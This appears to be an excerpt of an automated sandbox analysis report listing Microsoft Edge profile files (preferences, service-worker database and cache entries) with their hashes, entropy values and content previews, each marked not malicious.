                                                                                                                                                                                                                                                                          MD5:F73F00C757A5C884BC03C2E263C3F174
                                                                                                                                                                                                                                                                          SHA1:BD943C6EB9312EA3A3D32E098F73E61A639FD349
                                                                                                                                                                                                                                                                          SHA-256:F6FFF2EB599E8A043A7DE7799BFABE05B72A4BDD25A028B534430EE012C6FB34
                                                                                                                                                                                                                                                                          SHA-512:D4D643C7AAC62BB31C8903F405982A66695A100A4CE248729A5955484521EF370ADE2A009FD3FBCD0FC1DD17F8411812D62F58662E9CD0C1E03D3C81D2846140
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380904536315242","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF49120.TMP (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):13612
                                                                                                                                                                                                                                                                          Entropy (8bit):5.239382828551976
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:192:stbJ99QTryDigabatSuypXskrXIa34HkgYYUQ1i8CbV+FCwQwd4Cbq7NIaPfYJ:stbPGKSu4XskrXXrbGJQwmCm7NIj
                                                                                                                                                                                                                                                                          MD5:F73F00C757A5C884BC03C2E263C3F174
                                                                                                                                                                                                                                                                          SHA1:BD943C6EB9312EA3A3D32E098F73E61A639FD349
                                                                                                                                                                                                                                                                          SHA-256:F6FFF2EB599E8A043A7DE7799BFABE05B72A4BDD25A028B534430EE012C6FB34
                                                                                                                                                                                                                                                                          SHA-512:D4D643C7AAC62BB31C8903F405982A66695A100A4CE248729A5955484521EF370ADE2A009FD3FBCD0FC1DD17F8411812D62F58662E9CD0C1E03D3C81D2846140
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380904536315242","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):37149
                                                                                                                                                                                                                                                                          Entropy (8bit):5.564363640164279
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:0ZnyHkWPxhfkF8F1+UoAYDCx9Tuqh0VfUC9xbog/OV88apJv+rwc9oWR6ZmqKpQw:0ZnyHkWPxhfkFu1jaJ8aLvbUoWR65Rt6
                                                                                                                                                                                                                                                                          MD5:4AFAA8BA13143DA296EC368EFACC7946
                                                                                                                                                                                                                                                                          SHA1:D7D83AA46EF28CEDEB6D1AE4B39BE1C7E6606ADE
                                                                                                                                                                                                                                                                          SHA-256:211AA666C0922D78462908651D04F9E18B45357FCC060B1C11EC38E72184E923
                                                                                                                                                                                                                                                                          SHA-512:A06B17E49E15FA7B4E015FF39BC6E1415467D7D57A8DB404415C0BFE1707BE14F534C3CBA6DD9BEB8D2E72E34562278816672C22F434EF2ECCAC2A6E9A2EE031
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380904535643113","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380904535643113","location":5,"ma

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF3d746.TMP (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):37149
                                                                                                                                                                                                                                                                          Entropy (8bit):5.564363640164279
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:0ZnyHkWPxhfkF8F1+UoAYDCx9Tuqh0VfUC9xbog/OV88apJv+rwc9oWR6ZmqKpQw:0ZnyHkWPxhfkFu1jaJ8aLvbUoWR65Rt6
                                                                                                                                                                                                                                                                          MD5:4AFAA8BA13143DA296EC368EFACC7946
                                                                                                                                                                                                                                                                          SHA1:D7D83AA46EF28CEDEB6D1AE4B39BE1C7E6606ADE
                                                                                                                                                                                                                                                                          SHA-256:211AA666C0922D78462908651D04F9E18B45357FCC060B1C11EC38E72184E923
                                                                                                                                                                                                                                                                          SHA-512:A06B17E49E15FA7B4E015FF39BC6E1415467D7D57A8DB404415C0BFE1707BE14F534C3CBA6DD9BEB8D2E72E34562278816672C22F434EF2ECCAC2A6E9A2EE031
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380904535643113","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380904535643113","location":5,"ma

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.log

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2394
                                                                                                                                                                                                                                                                          Entropy (8bit):5.815548883732477
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:F2xc5NmVcncmoDCRORpllg2hEJfRHOldCRORpllg2h4iV0dntFCRORpllg2hE0R3:F2em2Mrd6JfBOrdey0dNrd60B2rd6B1
                                                                                                                                                                                                                                                                          MD5:C8A7235BD6BF5C429AF53AD0BD1F7477
                                                                                                                                                                                                                                                                          SHA1:CBAFE5B4CB8AB4A303A7C8BE5BF55FF31D280B74
                                                                                                                                                                                                                                                                          SHA-256:734006A2C5C7492AF4EEE1A8E6460AC6015BAF3FC695ADD10D522D059491FD17
                                                                                                                                                                                                                                                                          SHA-512:E9692BF5E98C6FACFF6C8C839E4A9550BD57BCA41502FA4EA5ADDA1C6123E1BE8839F9E27C738489FAA8F11C29A1CF80ABAF35FFFE560453589F59870A0D16FD
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2.hS.................INITDATA_NEXT_REGISTRATION_ID.1..INITDATA_NEXT_VERSION_ID.1.+INITDATA_UNIQUE_ORIGIN:https://ntp.msn.com/...REG:https://ntp.msn.com/.0......https://ntp.msn.com/edge/ntp...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true .(.0.8.......@...Z.b.....trueh..h..h..h..h..h..h..h..h..h..h.!p.x.................................REGID_TO_ORIGIN:0.https://ntp.msn.com/..RES:0.0.......https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmpt

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):299
                                                                                                                                                                                                                                                                          Entropy (8bit):5.186043699668907
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:iOrvejuM1CHhJ23oH+TcwtE/a252KLl5vXFIq2PCHhJ23oH+TcwtE/a2ZIFUv:7ajuAYeb8xL3OvBYeb8J2FUv
                                                                                                                                                                                                                                                                          MD5:1E0713A0F80F9D5646E680CF3B3026F7
                                                                                                                                                                                                                                                                          SHA1:8FB4B7D62F717B3C23C135CA3EE67A43E551BF28
                                                                                                                                                                                                                                                                          SHA-256:C818C7218EB8F7A84361DD517D7E043EC84F624B4372BCB63A1B24C223E33B06
                                                                                                                                                                                                                                                                          SHA-512:0DDB6579FB76FD744530FD6DBF3431B22E7F89BCC612F80C639CF463B74AA564ED8BD32E193289595A2B079866E232E68690A1BEB80FF1E4615863E3B780D143
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2025/01/09-08:55:45.345 1ad4 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2025/01/09-08:55:45.360 1ad4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):41
                                                                                                                                                                                                                                                                          Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                          MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                          SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                          SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                          SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):115808
                                                                                                                                                                                                                                                                          Entropy (8bit):5.578490399153549
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:B9LyxPXfOxr1lMe1nL/5L/TXJ6LwXRJ2b:91l/nL/5L/N6Lhb
                                                                                                                                                                                                                                                                          MD5:3F5EF27FE126B980C2D128DACF28C575
                                                                                                                                                                                                                                                                          SHA1:318CC96E5DC7A2032C6085E30BA2C33A6EB2E934
                                                                                                                                                                                                                                                                          SHA-256:0213AB0F5C5B5F929B6B725895EF32C7AEB4C5134B158CC9455F97C0AB866247
                                                                                                                                                                                                                                                                          SHA-512:92E8333C070DA53BB281CFBB30723868410F21BCCAF8ED1E757A40D2DF6BCDF17B8153F7E6BACC6E38AB2C9312459E2C56DFA03BFAE028CA7DCFD44E31371664
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):190361
                                                                                                                                                                                                                                                                          Entropy (8bit):6.388704838597688
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:+SgzH4W3tT5/woxkRnoeL/EO09GF5mpJzDr4KmQnBxo:Jk/wjRnlL/uM6pBjBK
                                                                                                                                                                                                                                                                          MD5:F258CB48A042B6092493E550ABC2B917
                                                                                                                                                                                                                                                                          SHA1:6DB1D995A20BC07E020D5A2DB1AEC5894E4FF50D
                                                                                                                                                                                                                                                                          SHA-256:76E38ABDF02E60DC67D10E576A528BDE7B9D6E3552096133AFEE565A8B377BA4
                                                                                                                                                                                                                                                                          SHA-512:77AEABA800D39F0FA620F2287ECC9C19096F6E799094756F8250373A7566842A19B07AE08501D3AF61AD0ED822AE81435F4BBED88D0509EED2221E916157F450
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:0\r..m..........rSG.....0....z3.................;o....x.@........,T.8..`,.....L`.....,T...`......L`......Rc.-6.....exports...Rc.!.I....module....Rc.OB.....define....Rb.]....amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H........Q.....{...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true.a........Db............D`.....E..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da.....d...,T.`.`z.....L`..........a............a.........Dr8..............

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):24
                                                                                                                                                                                                                                                                          Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:m+l:m
                                                                                                                                                                                                                                                                          MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                                                                          SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                                                                          SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                                                                          SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:0\r..m..................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):72
                                                                                                                                                                                                                                                                          Entropy (8bit):3.5016291673878204
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:I1K0QyXl/ltV/lxEg1W875x:I1SKgh8/
                                                                                                                                                                                                                                                                          MD5:9D179AB4A1EE831C06D3C764D789279E
                                                                                                                                                                                                                                                                          SHA1:FABF4CD57E3502BB02166B5BDB158CEA124C7275
                                                                                                                                                                                                                                                                          SHA-256:FCEF759D806B84ADE85985B89DC2B4C3FBC19F213F1F0593E532B2BC98F16424
                                                                                                                                                                                                                                                                          SHA-512:E2E41D2A0ECB224F0E011E594575B8C8FF61876F934C79C399F1B57C34CB728CE9EDB69C65E0968AC02D5B032F0A7E5F653BCA5DD5F2D23DFFD674EFFA926952
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:@....*[Goy retne.........................X....,................A.C../.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):72
                                                                                                                                                                                                                                                                          Entropy (8bit):3.5016291673878204
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:I1K0QyXl/ltV/lxEg1W875x:I1SKgh8/
                                                                                                                                                                                                                                                                          MD5:9D179AB4A1EE831C06D3C764D789279E
                                                                                                                                                                                                                                                                          SHA1:FABF4CD57E3502BB02166B5BDB158CEA124C7275
                                                                                                                                                                                                                                                                          SHA-256:FCEF759D806B84ADE85985B89DC2B4C3FBC19F213F1F0593E532B2BC98F16424
                                                                                                                                                                                                                                                                          SHA-512:E2E41D2A0ECB224F0E011E594575B8C8FF61876F934C79C399F1B57C34CB728CE9EDB69C65E0968AC02D5B032F0A7E5F653BCA5DD5F2D23DFFD674EFFA926952
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:@....*[Goy retne.........................X....,................A.C../.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF3f7de.TMP (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):72
                                                                                                                                                                                                                                                                          Entropy (8bit):3.5016291673878204
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:I1K0QyXl/ltV/lxEg1W875x:I1SKgh8/
                                                                                                                                                                                                                                                                          MD5:9D179AB4A1EE831C06D3C764D789279E
                                                                                                                                                                                                                                                                          SHA1:FABF4CD57E3502BB02166B5BDB158CEA124C7275
                                                                                                                                                                                                                                                                          SHA-256:FCEF759D806B84ADE85985B89DC2B4C3FBC19F213F1F0593E532B2BC98F16424
                                                                                                                                                                                                                                                                          SHA-512:E2E41D2A0ECB224F0E011E594575B8C8FF61876F934C79C399F1B57C34CB728CE9EDB69C65E0968AC02D5B032F0A7E5F653BCA5DD5F2D23DFFD674EFFA926952
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:@....*[Goy retne.........................X....,................A.C../.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):5193
                                                                                                                                                                                                                                                                          Entropy (8bit):3.416641953333902
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:96:49wzeTQKI4mVnKtFVPVzr9Xp+C+VijNokx2Ll9iSrl1qCdQaus6Nv:la0jVnKtFVPV39Xp+CKiBDQLl9iSrlM7
                                                                                                                                                                                                                                                                          MD5:18D1CC86C4C19429BC69C1C504FCCE04
                                                                                                                                                                                                                                                                          SHA1:468AA4DF115B57862F2326E02F4CE884625C5FBA
                                                                                                                                                                                                                                                                          SHA-256:97698FD44F209061DE89833B40635A7354A954A3295E94BA46FEF5FA0870AC3F
                                                                                                                                                                                                                                                                          SHA-512:1F7EAEF4E717AD459404BE629D316E26BD659A4A36DC31FCD622A874A17C6529711225702C201810470E0CAA7CACAC4A5FF6DB7C0B1233A4F76BF9A3A9E48AE5
                                                                                                                                                                                                                                                                          Malicious:false
